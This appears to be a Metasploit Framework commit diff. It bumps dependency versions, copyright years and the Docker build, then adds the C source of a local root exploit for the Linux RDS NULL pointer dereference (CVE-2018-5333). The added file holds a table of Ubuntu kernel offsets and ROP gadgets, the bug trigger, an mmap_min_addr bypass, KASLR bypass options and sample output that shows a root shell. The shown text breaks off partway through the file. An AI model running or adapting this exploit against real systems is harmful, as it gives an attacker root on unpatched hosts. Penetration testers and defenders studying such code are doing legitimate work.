automatic module_metadata_base.json update

Land #12877 , rand_text fix for doublepulsar_rce
Prefer exploit.rb's rand_text wrapper
2020-01-22 16:42:45 -06:00 · 2020-01-22 16:40:24 -06:00 · 2020-01-22 16:37:36 -06:00 · 2020-01-22 14:53:12 -06:00 · 2020-01-22 17:00:22 +00:00 · 2020-01-22 09:41:39 -06:00
294 changed files with 3536 additions and 924 deletions
@@ -1,4 +1,4 @@
-Copyright (C) 2006-2018, Rapid7, Inc.
+Copyright (C) 2006-2020, Rapid7, Inc.
 All rights reserved.

 Redistribution and use in source and binary forms, with or without modification,
@@ -29,7 +29,7 @@ RUN apk add --no-cache \
      git \
    && echo "gem: --no-document" > /etc/gemrc \
    && gem update --system 3.0.6 \
-    && bundle install --clean --no-cache --system $BUNDLER_ARGS \
+    && bundle install --force --clean --no-cache --system $BUNDLER_ARGS \
    # temp fix for https://github.com/bundler/bundler/issues/6680
    && rm -rf /usr/local/bundle/cache \
    # needed so non root users can read content of the bundle
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (5.0.68)
+    metasploit-framework (5.0.71)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -23,11 +23,11 @@ PATH
      jsobfu
      json
      metasm
-      metasploit-concern
-      metasploit-credential
-      metasploit-model
+      metasploit-concern (~> 2.0.0)
+      metasploit-credential (~> 3.0.0)
+      metasploit-model (~> 2.0.4)
      metasploit-payloads (= 1.3.83)
-      metasploit_data_models (= 3.0.10)
+      metasploit_data_models (~> 3.0.10)
      metasploit_payloads-mettle (= 0.5.16)
      mqtt
      msgpack
@@ -117,13 +117,13 @@ GEM
    arel-helpers (2.11.0)
      activerecord (>= 3.1.0, < 7)
    aws-eventstream (1.0.3)
-    aws-partitions (1.260.0)
-    aws-sdk-core (3.86.0)
+    aws-partitions (1.264.0)
+    aws-sdk-core (3.89.1)
      aws-eventstream (~> 1.0, >= 1.0.2)
      aws-partitions (~> 1, >= 1.239.0)
      aws-sigv4 (~> 1.1)
      jmespath (~> 1.0)
-    aws-sdk-ec2 (1.129.0)
+    aws-sdk-ec2 (1.134.0)
      aws-sdk-core (~> 3, >= 3.71.0)
      aws-sigv4 (~> 1.1)
    aws-sdk-iam (1.32.0)
@@ -146,7 +146,7 @@ GEM
    coderay (1.1.2)
    concurrent-ruby (1.0.5)
    cookiejar (0.3.3)
-    crass (1.0.5)
+    crass (1.0.6)
    daemons (1.3.1)
    diff-lcs (1.3)
    dnsruby (1.61.3)
@@ -221,7 +221,7 @@ GEM
    metasploit_payloads-mettle (0.5.16)
    method_source (0.9.2)
    mini_portile2 (2.4.0)
-    minitest (5.13.0)
+    minitest (5.14.0)
    mqtt (0.5.0)
    msgpack (1.3.1)
    multipart-post (2.1.1)
@@ -231,7 +231,8 @@ GEM
    nexpose (7.2.1)
    nokogiri (1.10.7)
      mini_portile2 (~> 2.4.0)
-    octokit (4.14.0)
+    octokit (4.15.0)
+      faraday (>= 0.9)
      sawyer (~> 0.8.0, >= 0.5.3)
    openssl-ccm (1.2.2)
    openvas-omp (0.0.4)
@@ -254,7 +255,7 @@ GEM
    pry (0.12.2)
      coderay (~> 1.1.0)
      method_source (~> 0.9.0)
-    public_suffix (4.0.2)
+    public_suffix (4.0.3)
    rack (1.6.12)
    rack-protection (1.5.5)
      rack
@@ -291,7 +292,7 @@ GEM
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.21)
+    rex-exploitation (0.1.22)
      jsobfu
      metasm
      rex-arch
@@ -304,7 +305,7 @@ GEM
      rex-arch
    rex-ole (0.1.6)
      rex-text
-    rex-powershell (0.1.83)
+    rex-powershell (0.1.84)
      rex-random_identifier
      rex-text
    rex-random_identifier (0.1.4)
@@ -379,7 +380,7 @@ GEM
    thread_safe (0.3.6)
    tilt (2.0.10)
    timecop (0.9.1)
-    ttfunk (1.5.1)
+    ttfunk (1.6.1)
    tzinfo (1.2.6)
      thread_safe (~> 0.1)
    tzinfo-data (1.2019.3)
@@ -394,7 +395,7 @@ GEM
      activemodel (>= 4.2.7)
      activesupport (>= 4.2.7)
    xmlrpc (0.3.0)
-    yard (0.9.22)
+    yard (0.9.24)

 PLATFORMS
  ruby
@@ -2,7 +2,7 @@ Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: http://www.metasploit.com/

 Files: *
-Copyright: 2006-2018, Rapid7, Inc.
+Copyright: 2006-2020, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -10,9 +10,9 @@ afm, 0.2.2, MIT
 arel, 6.0.4, MIT
 arel-helpers, 2.11.0, MIT
 aws-eventstream, 1.0.3, "Apache 2.0"
-aws-partitions, 1.260.0, "Apache 2.0"
-aws-sdk-core, 3.86.0, "Apache 2.0"
-aws-sdk-ec2, 1.129.0, "Apache 2.0"
+aws-partitions, 1.264.0, "Apache 2.0"
+aws-sdk-core, 3.89.1, "Apache 2.0"
+aws-sdk-ec2, 1.134.0, "Apache 2.0"
 aws-sdk-iam, 1.32.0, "Apache 2.0"
 aws-sdk-kms, 1.27.0, "Apache 2.0"
 aws-sdk-s3, 1.60.1, "Apache 2.0"
@@ -26,7 +26,7 @@ bundler, 1.17.3, MIT
 coderay, 1.1.2, MIT
 concurrent-ruby, 1.0.5, MIT
 cookiejar, 0.3.3, unknown
-crass, 1.0.5, MIT
+crass, 1.0.6, MIT
 daemons, 1.3.1, MIT
 diff-lcs, 1.3, "MIT, Artistic-2.0, GPL-2.0+"
 dnsruby, 1.61.3, "Apache 2.0"
@@ -53,14 +53,14 @@ loofah, 2.4.0, MIT
 metasm, 1.0.4, LGPL-2.1
 metasploit-concern, 2.0.5, "New BSD"
 metasploit-credential, 3.0.4, "New BSD"
-metasploit-framework, 5.0.68, "New BSD"
+metasploit-framework, 5.0.71, "New BSD"
 metasploit-model, 2.0.4, "New BSD"
 metasploit-payloads, 1.3.83, "3-clause (or ""modified"") BSD"
 metasploit_data_models, 3.0.10, "New BSD"
 metasploit_payloads-mettle, 0.5.16, "3-clause (or ""modified"") BSD"
 method_source, 0.9.2, MIT
 mini_portile2, 2.4.0, MIT
-minitest, 5.13.0, MIT
+minitest, 5.14.0, MIT
 mqtt, 0.5.0, MIT
 msgpack, 1.3.1, "Apache 2.0"
 multipart-post, 2.1.1, MIT
@@ -69,7 +69,7 @@ net-ssh, 5.2.0, MIT
 network_interface, 0.0.2, MIT
 nexpose, 7.2.1, "New BSD"
 nokogiri, 1.10.7, MIT
-octokit, 4.14.0, MIT
+octokit, 4.15.0, MIT
 openssl-ccm, 1.2.2, MIT
 openvas-omp, 0.0.4, MIT
 packetfu, 1.1.13, BSD
@@ -80,7 +80,7 @@ pg, 0.21.0, "New BSD"
 pg_array_parser, 0.0.9, unknown
 postgres_ext, 3.0.1, MIT
 pry, 0.12.2, MIT
-public_suffix, 4.0.2, MIT
+public_suffix, 4.0.3, MIT
 rack, 1.6.12, MIT
 rack-protection, 1.5.5, MIT
 rack-test, 0.6.3, MIT
@@ -96,12 +96,12 @@ rex-arch, 0.1.13, "New BSD"
 rex-bin_tools, 0.1.6, "New BSD"
 rex-core, 0.1.13, "New BSD"
 rex-encoder, 0.1.4, "New BSD"
-rex-exploitation, 0.1.21, "New BSD"
+rex-exploitation, 0.1.22, "New BSD"
 rex-java, 0.1.5, "New BSD"
 rex-mime, 0.1.5, "New BSD"
 rex-nop, 0.1.1, "New BSD"
 rex-ole, 0.1.6, "New BSD"
-rex-powershell, 0.1.83, "New BSD"
+rex-powershell, 0.1.84, "New BSD"
 rex-random_identifier, 0.1.4, "New BSD"
 rex-registry, 0.1.3, "New BSD"
 rex-rop_builder, 0.1.3, "New BSD"
@@ -135,7 +135,7 @@ thor, 1.0.1, MIT
 thread_safe, 0.3.6, "Apache 2.0"
 tilt, 2.0.10, MIT
 timecop, 0.9.1, MIT
-ttfunk, 1.5.1, "Nonstandard, GPL-2.0, GPL-3.0"
+ttfunk, 1.6.1, "Nonstandard, GPL-2.0, GPL-3.0"
 tzinfo, 1.2.6, MIT
 tzinfo-data, 1.2019.3, MIT
 warden, 1.2.7, MIT
@@ -144,4 +144,4 @@ websocket-extensions, 0.1.4, "Apache 2.0"
 windows_error, 0.1.2, BSD
 xdr, 2.0.0, "Apache 2.0"
 xmlrpc, 0.3.0, ruby
-yard, 0.9.22, MIT
+yard, 0.9.24, MIT
@@ -0,0 +1,883 @@
+// Local root exploit for Linux RDS rds_atomic_free_op NULL pointer dereference
+// in the rds kernel module in the Linux kernel through 4.14.13 (CVE-2018-5333).
+//
+// Includes KASLR, SMEP, and mmap_min_addr bypasses. No SMAP bypass.
+//
+// Targets:
+// - Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116
+// - Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54
+//
+// The rds kernel module is not loaded by default on Ubuntu, and is blacklisted
+// in /etc/modprobe.d/blacklist-rare-network.conf to prevent autoloading.
+// - install: sudo apt install "linux-image-extra-$(uname -r)-generic"
+// - load:    sudo insmod "/lib/modules/$(uname -r)/kernel/net/rds/rds.ko"
+//
+// This exploit is a modified extension of the original local root
+// proof of concept exploit written by wbowling as an example of using
+// CVE-2019-9213 to make previous kernel bugs exploitable:
+// - https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4
+//
+// The original exploit is based on the null pointer dereference
+// reproducer proof of concept and analysis by 0x36:
+// - https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
+//
+// wbowling has done most of the hard work, by utilising Jann Horn's
+// mmap_min_addr bypass technique (CVE-2019-9213), allowing userland to mmap
+// virtual address 0 (without which this bug would not be exploitable on
+// systems with a sufficiently large value for vm.mmap_min_addr);
+// and developing the appropriate ROP chain.
+// - https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
+//
+// This exploit adds offsets for additional kernels, and introduces some
+// additional features, such as KASLR bypasses and system checks, including:
+// - check if system supports SMAP
+// - check if system supports RDS sockets
+// - Jann Horn's mincore KASLR bypass via heap page disclosure (CVE-2017-16994)
+//   - https://bugs.chromium.org/p/project-zero/issues/detail?id=1431
+// - spender's /proc/kallsyms KASLR bypass (requires kernel.kptr_restrict=0)
+//   - https://grsecurity.net/~spender/exploits/exploit.txt
+// - xairy's syslog KASLR bypass (requires kernel.dmesg_restrict=0)
+//   - https://github.com/xairy/kernel-exploits/blob/master/CVE-2017-1000112/poc.c
+// - lizzie's perf_event_open KASLR bypass (requires kernel.perf_event_paranoid<2)
+//   - https://blog.lizzie.io/kaslr-and-perf.html
+//
+// Shoutout to nstarke for adding additional kernel offsets.
+// - https://github.com/bcoles/kernel-exploits/pulls?q=author:nstarke+cve-2018-5333
+//
+// This exploit also uses various code patterns copied from:
+// - xairy's exploits:
+//   - https://github.com/xairy/kernel-exploits
+// - vnik's kernel ROP code:
+//   - https://github.com/vnik5287/kernel_rop
+// ---
+// $ gcc cve-2018-5333.c -o cve-2018-5333 -Wall
+// $ ./cve-2018-5333
+// Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)
+// [.] checking kernel version...
+// [.] kernel version '4.4.0-116-generic #140-Ubuntu' detected
+// [~] done, version looks good
+// [.] checking system...
+// [~] done, looks good
+// [.] mapping null address...
+// [~] done, mapped null address
+// [.] KASLR bypass enabled, getting kernel base address
+// [.] trying /proc/kallsyms...
+// [-] kernel base not found in /proc/kallsyms
+// [.] trying syslog...
+// [-] kernel base not found in syslog
+// [.] trying perf_event_open sampling...
+// [.] done, kernel text:   ffffffff9f000000
+// [.] commit_creds:        ffffffff9f0a4cf0
+// [.] prepare_kernel_cred: ffffffff9f0a50e0
+// [.] mmapping fake stack...
+// [~] done, fake stack mmapped
+// [.] executing payload 0x402119...
+// [+] got root
+// # id
+// uid=0(root) gid=0(root) groups=0(root)
+// ---
+// https://github.com/bcoles/kernel-exploits/tree/master/CVE-2018-5333
+// <bcoles@gmail.com>
+
+#define _GNU_SOURCE
+
+#include <fcntl.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdio.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <linux/perf_event.h>
+#include <netinet/in.h>
+#include <sys/ioctl.h>
+#include <sys/klog.h>
+#include <sys/mman.h>
+#include <sys/socket.h>
+#include <sys/stat.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <sys/utsname.h>
+
+#define DEBUG
+
+#ifdef DEBUG
+#  define dprintf printf
+#else
+#  define dprintf
+#endif
+
+#define ENABLE_SYSTEM_CHECKS            1
+#define ENABLE_KASLR_BYPASS             1
+
+#if ENABLE_KASLR_BYPASS
+#  define KERNEL_BASE_MIN               0xffffffff00000000ul
+#  define KERNEL_BASE_MAX               0xffffffffff000000ul
+#  define ENABLE_KASLR_BYPASS_KALLSYMS  1
+#  define ENABLE_KASLR_BYPASS_SYSLOG    1
+#  define ENABLE_KASLR_BYPASS_PERF      1
+#  define ENABLE_KASLR_BYPASS_MINCORE   1
+#endif
+
+// Can be overwritten by argv[1]
+char *SHELL = "/bin/sh";
+
+// Will be overwritten if ENABLE_KASLR_BYPASS is enabled (1)
+unsigned long KERNEL_BASE = 0xffffffff81000000ul;
+
+// Will be overwritten by detect_versions().
+int kernel = -1;
+
+// kernel target struct, using ROP chain from wbowling's exploit
+struct kernel_info {
+  const char* kernel_version;
+  uint64_t commit_creds;
+  uint64_t prepare_kernel_cred;
+  uint64_t xor_rdi;     //: xor edi, edi ; ret
+  uint64_t mov_rdi_rax; //: mov rdi, rax ; pop rbx ; mov rax, rdi ; pop r12 ; pop rbp ; ret
+  uint64_t xchg_esp;    //: xchg eax, esp ; shr bl, 0xbf ; xor eax, eax ; pop rbp ; ret
+  uint64_t swapgs;      //: swapgs ; pop rbp ; ret
+  uint64_t iretq;       //: iretq
+};
+
+// Targets
+struct kernel_info kernels[] = {
+  { "4.4.0-21-generic #37-Ubuntu",   0xa21c0, 0xa25b0, 0x5d0c5, 0x178157, 0x3f8158, 0x64644, 0x4cc7da },
+  { "4.4.0-22-generic #40-Ubuntu",   0xa2220, 0xa2610, 0x5d0c5, 0x178217, 0x3f89e8, 0x64644, 0x7d005  },
+  { "4.4.0-24-generic #43-Ubuntu",   0xa2340, 0xa2730, 0x5d0c5, 0x178447, 0x3f98b8, 0x64644, 0x7d125  },
+  { "4.4.0-28-generic #47-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x178717, 0x3f9f38, 0x64644, 0x585dc  },
+  { "4.4.0-31-generic #50-Ubuntu",   0xa24a0, 0xa2890, 0x5d0c5, 0x1787a7, 0x3ffed8, 0x64644, 0x7d125  },
+  { "4.4.0-38-generic #57-Ubuntu",   0xa2570, 0xa2960, 0x5d0c5, 0x178a97, 0x400968, 0x64634, 0x7d1e5  },
+  { "4.4.0-42-generic #62-Ubuntu",   0xa25c0, 0xa29b0, 0x5d0c5, 0x178ac7, 0x400d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-98-generic #121-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x17a427, 0x40a138, 0x64694, 0x4b243  },
+  { "4.4.0-108-generic #131-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-109-generic #132-Ubuntu", 0xa3420, 0xa3810, 0x5d0c5, 0x17af37, 0x40aa98, 0x646a4, 0x7dd35  },
+  { "4.4.0-112-generic #135-Ubuntu", 0xa3a90, 0xa3e80, 0x5d0c5, 0x17b657, 0x40b238, 0x646a4, 0x54137c },
+  { "4.4.0-116-generic #140-Ubuntu", 0xa4cf0, 0xa50e0, 0x5e0c5, 0x17d5d7, 0x40ed08, 0x65734, 0x3a5b04 },
+
+  /* Untested:
+  { "4.4.0-51-generic #72-Ubuntu",   0xa2670, 0xa2a60, 0x5d0c5, 0x178cf7, 0x404d78, 0x64634, 0x7d1a5  },
+  { "4.4.0-62-generic #83-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179747, 0x406a78, 0x64634, 0x7d1e5  },
+  { "4.4.0-63-generic #84-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
+  { "4.4.0-66-generic #87-Ubuntu",   0xa2840, 0xa2c30, 0x5d0c5, 0x179827, 0x406e98, 0x64634, 0x406eb  },
+  { "4.4.0-70-generic #91-Ubuntu",   0xa27b0, 0xa2ba0, 0x5d0c5, 0x179847, 0x4070c8, 0x64664, 0x406eb  },
+  { "4.4.0-79-generic #100-Ubuntu",  0xa2800, 0xa2bf0, 0x5d0c5, 0x179a67, 0x408338, 0x64664, 0x7d235  },
+  { "4.4.0-87-generic #110-Ubuntu",  0xa2860, 0xa2c50, 0x5d0c5, 0x179ca7, 0x408768, 0x64694, 0x7d285  },
+  { "4.4.0-89-generic #112-Ubuntu",  0xa28a0, 0xa2c90, 0x5d0c5, 0x179d27, 0x408ae8, 0x64694, 0x7d265  },
+  { "4.4.0-96-generic #119-Ubuntu",  0xa28c0, 0xa2cb0, 0x5d0c5, 0x179e27, 0x409a48, 0x64694, 0x7d235  },
+  { "4.4.0-97-generic #120-Ubuntu",  0xa2850, 0xa2c40, 0x5d0c5, 0x179e47, 0x409a58, 0x64694, 0x4ed41  },
+  */
+
+  { "4.4.0-21-lowlatency #37-Ubuntu",   0xa3150, 0xa3560, 0x5e0c5, 0x17b2c7, 0x401288, 0x64d34, 0x7d95c },
+  { "4.4.0-22-lowlatency #40-Ubuntu",   0xa31c0, 0xa35d0, 0x5e0c5, 0x17b397, 0x401b48, 0x64d34, 0x7d9bc },
+  { "4.4.0-24-lowlatency #43-Ubuntu",   0xa32e0, 0xa36f0, 0x5e0c5, 0x17b5e7, 0x402958, 0x64d34, 0x7dadc },
+  { "4.4.0-28-lowlatency #47-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b8c7, 0x402f48, 0x64d34, 0x7dadc },
+  //{ "4.4.0-31-lowlatency #50-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409018, 0x64d34, 0x7dadc },
+  //{ "4.4.0-34-lowlatency #53-Ubuntu",   0xa3450, 0xa3860, 0x5e0c5, 0x17b9a7, 0x409088, 0x64d34, 0x7dadc },
+  { "4.4.0-36-lowlatency #55-Ubuntu",   0xa3430, 0xa3840, 0x5e0c5, 0x17b9e7, 0x409318, 0x64d24, 0x7dacc },
+  { "4.4.0-38-lowlatency #57-Ubuntu",   0xa3500, 0xa3910, 0x5e0c5, 0x17bcb7, 0x409b38, 0x64d24, 0x4c030 },
+  { "4.4.0-42-lowlatency #62-Ubuntu",   0xa3560, 0xa3970, 0x5e0c5, 0x17bcf7, 0x409f68, 0x64d24, 0x7db6c },
+  { "4.4.0-98-lowlatency #121-Ubuntu",  0xa38c0, 0xa3cd0, 0x5e0c5, 0x17d737, 0x413408, 0x64d84, 0x24454 },
+  { "4.4.0-109-lowlatency #132-Ubuntu", 0xa5530, 0xa5940, 0x5f0c5, 0x17f257, 0x414c18, 0x65d94, 0x7f7ac },
+  { "4.4.0-112-lowlatency #135-Ubuntu", 0xa5bd0, 0xa5fe0, 0x5f0c5, 0x17f9a7, 0x415448, 0x65d94, 0x7f8dc },
+  { "4.4.0-116-lowlatency #140-Ubuntu", 0xa6e00, 0xa7210, 0x600c5, 0x1818f7, 0x418a38, 0x66de4, 0x809ef },
+
+  { "4.8.0-34-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-36-generic #36~16.04.1-Ubuntu", 0xa5d50, 0xa6140, 0x5d0c5, 0x1876d7, 0x43d208, 0x642f4, 0x7ed2b },
+  { "4.8.0-39-generic #42~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-41-generic #44~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43da98, 0x642f4, 0x7ed2b },
+  { "4.8.0-42-generic #45~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dea8, 0x642f4, 0x5c4f3 },
+  { "4.8.0-44-generic #47~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-45-generic #48~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-46-generic #49~16.04.1-Ubuntu", 0xa5cf0, 0xa60e0, 0x5d0c5, 0x187767, 0x43dac8, 0x642f4, 0x7ed2b },
+  { "4.8.0-49-generic #52~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-51-generic #54~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43dce8, 0x642f4, 0x7ed3b },
+  { "4.8.0-52-generic #55~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-53-generic #56~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  { "4.8.0-54-generic #57~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e208, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-56-generic #61~16.04.1-Ubuntu", 0xa5d00, 0xa60f0, 0x5d0c5, 0x187777, 0x43e278, 0x642f4, 0x7ed3b },
+  //{ "4.8.0-58-generic #63~16.04.1-Ubuntu", 0xa5d20, 0xa6110, 0x5d0c5, 0x187797, 0x43dfa8, 0x642f4, 0x7ed5b },
+
+  { "4.8.0-34-lowlatency #36~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18ae07, 0x4467f8, 0x649f4, 0x7f902 },
+  { "4.8.0-36-lowlatency #36~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18ae07, 0x4467f8, 0x649f4, 0x7f902 },
+  //{ "4.8.0-39-lowlatency #42~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aec7, 0x4470d8, 0x649f4, 0x7f902 },
+  { "4.8.0-41-lowlatency #44~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aec7, 0x4470d8, 0x649f4, 0x7f902 },
+  { "4.8.0-42-lowlatency #45~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447428, 0x649f4, 0x4b3e3 },
+  { "4.8.0-44-lowlatency #47~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-45-lowlatency #48~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-46-lowlatency #49~16.04.1-Ubuntu", 0xa6ec0, 0xa72d0, 0x5e0c5, 0x18aeb7, 0x447108, 0x649f4, 0x4b3e3 },
+  { "4.8.0-49-lowlatency #52~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-51-lowlatency #54~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x447278, 0x649f4, 0x4b3e3 },
+  { "4.8.0-52-lowlatency #55~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-53-lowlatency #56~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x4b3e3 },
+  { "4.8.0-54-lowlatency #57~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477a8, 0x649f4, 0x7f912 },
+  //{ "4.8.0-56-lowlatency #61~16.04.1-Ubuntu", 0xa6ed0, 0xa72e0, 0x5e0c5, 0x18aec7, 0x4477f8, 0x649f4, 0x7f912 },
+  //{ "4.8.0-58-lowlatency #63~16.04.1-Ubuntu", 0xa6ef0, 0xa7300, 0x5e0c5, 0x18aee7, 0x447568, 0x649f4, 0x7f932 },
+
+  //{ "4.10.0-14-generic #16~16.04.1-Ubuntu", 0xab610, 0xaba00, 0x600c5, 0x194ac7, 0x458288, 0x67764, 0x34c4b },
+  //{ "4.13.0-16-generic #19~16.04.3-Ubuntu", 0xa8220, 0xa85f0, 0x5f0c5, 0x19c8a7, 0x462d18, 0x668b4, 0x2f2d4 },
+  //{ "4.13.0-37-generic #42~16.04.1-Ubuntu", 0xab1d0, 0xab5a0, 0x610c5, 0x1a0827, 0x46bf58, 0x68944, 0x3381b },
+};
+
+// * * * * * * * * * * * * * * * Trigger * * * * * * * * * * * * * * * * * *
+// https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
+
+#define RAND_SIZE 4096
+
+#ifndef SOL_RDS
+#  define SOL_RDS 276
+#endif
+#ifndef RDS_CMSG_MASKED_ATOMIC_CSWP
+#  define RDS_CMSG_MASKED_ATOMIC_CSWP 9
+#endif
+#ifndef AF_RDS
+#  define AF_RDS 0x15
+#endif
+
+void trigger_bug()
+{
+  struct sockaddr_in sin;
+  struct msghdr msg;
+  char buf[RAND_SIZE];
+  struct cmsghdr cmsg;
+
+  memset(&sin, 0, sizeof(struct sockaddr));
+  memset(&msg, 0, sizeof(msg));
+  memset(buf, 0x40, sizeof(buf));
+  memset(&cmsg, 0, sizeof(cmsg));
+
+  int fd = socket(AF_RDS, 5, 0);
+  if(fd < 0) {
+    dprintf("[-] socket(AF_RDS): %m\n");
+    return;
+  }
+
+  sin.sin_family = AF_INET;
+  sin.sin_port = htons(2000);
+  sin.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
+
+  bind(fd, (struct sockaddr*)&sin, sizeof(sin));
+
+  cmsg.cmsg_len = RAND_SIZE;
+  cmsg.cmsg_type = RDS_CMSG_MASKED_ATOMIC_CSWP;
+  cmsg.cmsg_level = SOL_RDS;
+
+  memcpy(&buf[0], &cmsg, sizeof(cmsg));
+
+  *(uint64_t *)(buf + 0x18) = 0x40404000; /* args->local_addr */
+
+  msg.msg_name = &sin;
+  msg.msg_namelen = sizeof(sin);
+  msg.msg_iov = NULL;
+  msg.msg_iovlen = 0;
+  msg.msg_control = buf;
+  msg.msg_controllen = RAND_SIZE;
+  msg.msg_flags = MSG_DONTROUTE|MSG_PROXY|MSG_WAITALL;
+
+  sendmsg(fd, &msg, 0);
+}
+
+// * * * * * * * * * * * * * * map null address * * * * * * * * * * * * *
+// https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
+
+void map_null() {
+  void *map = mmap((void *)0x10000, 0x1000, PROT_READ | PROT_WRITE,
+    MAP_PRIVATE | MAP_ANONYMOUS | MAP_GROWSDOWN | MAP_FIXED, -1, 0);
+
+  if (map == MAP_FAILED) {
+    dprintf("[-] mmap(null): %m\n");
+    exit(EXIT_FAILURE);
+  }
+
+  char* path = "/proc/self/mem";
+  int fd = open(path, O_RDWR);
+
+  if (fd == -1) {
+    dprintf("open(%s): %m\n", path);
+    exit(EXIT_FAILURE);
+  }
+
+  unsigned long addr = (unsigned long)map;
+
+  while (addr != 0) {
+    addr -= 0x1000;
+    if (lseek(fd, addr, SEEK_SET) == -1) {
+      dprintf("lseek()\n");
+      exit(EXIT_FAILURE);
+    }
+    char cmd[1000];
+    sprintf(cmd, "LD_DEBUG=help su 1>&%d", fd);
+    system(cmd);
+  }
+}
+
+// * * * * * * * * * * * * * * * save state * * * * * * * * * * * * * * *
+// https://github.com/vnik5287/kernel_rop
+
+unsigned long user_cs, user_ss, user_rflags;
+
+static void save_state() {
+  asm(
+  "movq %%cs, %0\n"
+  "movq %%ss, %1\n"
+  "pushfq\n"
+  "popq %2\n"
+  : "=r" (user_cs), "=r" (user_ss), "=r" (user_rflags) : : "memory");
+}
+
+// * * * * * * * * * * * * * * SIGSEGV handler * * * * * * * * * * * * * *
+
+void handler(int signo, siginfo_t* info, void* vcontext) {}
+
+void debug_enable_sigsev_handler() {
+  struct sigaction action;
+  memset(&action, 0, sizeof(struct sigaction));
+  action.sa_flags = SA_SIGINFO;
+  action.sa_sigaction = handler;
+  sigaction(SIGSEGV, &action, NULL);
+}
+
+// * * * * * * * * * * * * * * * * Detect * * * * * * * * * * * * * * * *
+
+#define CHUNK_SIZE 1024
+
+int read_file(const char* file, char* buffer, int max_length) {
+  int f = open(file, O_RDONLY);
+  if (f == -1)
+    return -1;
+  int bytes_read = 0;
+  while (1) {
+    int bytes_to_read = CHUNK_SIZE;
+    if (bytes_to_read > max_length - bytes_read)
+      bytes_to_read = max_length - bytes_read;
+    int rv = read(f, &buffer[bytes_read], bytes_to_read);
+    if (rv == -1)
+      return -1;
+    bytes_read += rv;
+    if (rv == 0)
+      return bytes_read;
+  }
+}
+
+#define PROC_CPUINFO_LENGTH 4096
+
+static int check_env() {
+  int fd = socket(AF_RDS, 5, 0);
+  if(fd < 0) {
